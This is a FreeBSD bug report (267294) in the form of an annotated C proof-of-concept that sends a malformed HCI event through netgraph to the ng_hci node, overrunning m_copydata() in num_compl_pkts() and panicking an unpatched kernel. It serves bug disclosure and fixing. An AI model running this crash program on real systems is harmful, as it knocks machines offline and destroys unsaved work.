[Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata()
Date: Wed, 26 Oct 2022 21:28:58 UTC
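/*
 * https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=267294
 *
 * Comment #1 from Robert Morris <rtm@lcs.mit.edu>:
 * The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also
 * panic.  Here's a demo program.
 *
 * What the demo does: creates an ng_hci node through netgraph(4), wires its
 * "drv" hook to a socket node, and pushes a single malformed HCI event
 * packet whose header bytes claim more data than the PAYLOAD_LEN bytes that
 * are actually delivered.  Requires root (kldload, node creation) and, on an
 * unpatched kernel, is expected to panic the machine -- run it only in a
 * disposable VM.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph.h>

/*
 * BUF_LEN: size of the scratch buffer.
 * PAYLOAD_LEN: number of bytes handed to the node -- deliberately smaller
 * than the lengths encoded in the packet header (see main()).
 */
enum { BUF_LEN = 128, PAYLOAD_LEN = 116 };

int
main(void)
{
	setlinebuf(stdout);

	/* No user-space core dumps; the crash of interest is in the kernel. */
	struct rlimit r;
	r.rlim_cur = r.rlim_max = 0;
	(void)setrlimit(RLIMIT_CORE, &r);
	signal(SIGPIPE, SIG_IGN);

	/* Best effort: either module may already be loaded, so the exit
	 * status is not checked. */
	(void)system("kldload netgraph");
	(void)system("kldload ng_hci");

	/* The original ignored this return and went on with cs = ds = -1,
	 * which makes every later call fail silently and the demo a no-op. */
	int cs = -1;
	int ds = -1;
	if (NgMkSockNode(NULL, &cs, &ds) < 0) {
		perror("NgMkSockNode");
		return 1;
	}

	/* Attach an "hci" node: our hook "hook" <-> its driver-side hook "drv". */
	struct ngm_mkpeer mkp;
	memset(&mkp, 0, sizeof mkp);
	snprintf(mkp.type, sizeof mkp.type, "hci");
	snprintf(mkp.ourhook, sizeof mkp.ourhook, "hook");
	snprintf(mkp.peerhook, sizeof mkp.peerhook, "drv");
	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, NGM_MKPEER, &mkp,
	    sizeof mkp) < 0) {
		fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type,
		    mkp.peerhook);
		return 1;
	}

	/*
	 * Build the packet.  The original did
	 *     *(long long *)(buf + 0) ^= 0xecfb;
	 * which on a little-endian host means buf[0] ^= 0xfb and
	 * buf[1] ^= 0xec.  Setting the two bytes directly gives the same
	 * bytes without the strict-aliasing / alignment UB of the cast and
	 * without depending on host endianness.
	 */
	unsigned char buf[BUF_LEN];
	memset(buf, 0xff, sizeof buf);
	buf[0] = 0xff ^ 0xfb;	/* 0x04 */
	buf[1] = 0xff ^ 0xec;	/* 0x13 */
	/*
	 * NOTE(review): presumably 0x04 is the HCI event packet indicator and
	 * 0x13 the "Number of Completed Packets" event code, with the
	 * remaining 0xff bytes read as a parameter length / handle count far
	 * larger than PAYLOAD_LEN -- which is what drives the m_copydata()
	 * calls in num_compl_pkts() past the end of the mbuf.  Verify the
	 * constants against ng_hci.h before relying on this description.
	 */

	if (NgSendData(ds, "hook", buf, PAYLOAD_LEN) < 0) {
		perror("NgSendData");
		return 1;
	}
	printf("sent %d-byte packet to hook \"hook\"\n", PAYLOAD_LEN);
	return 0;
}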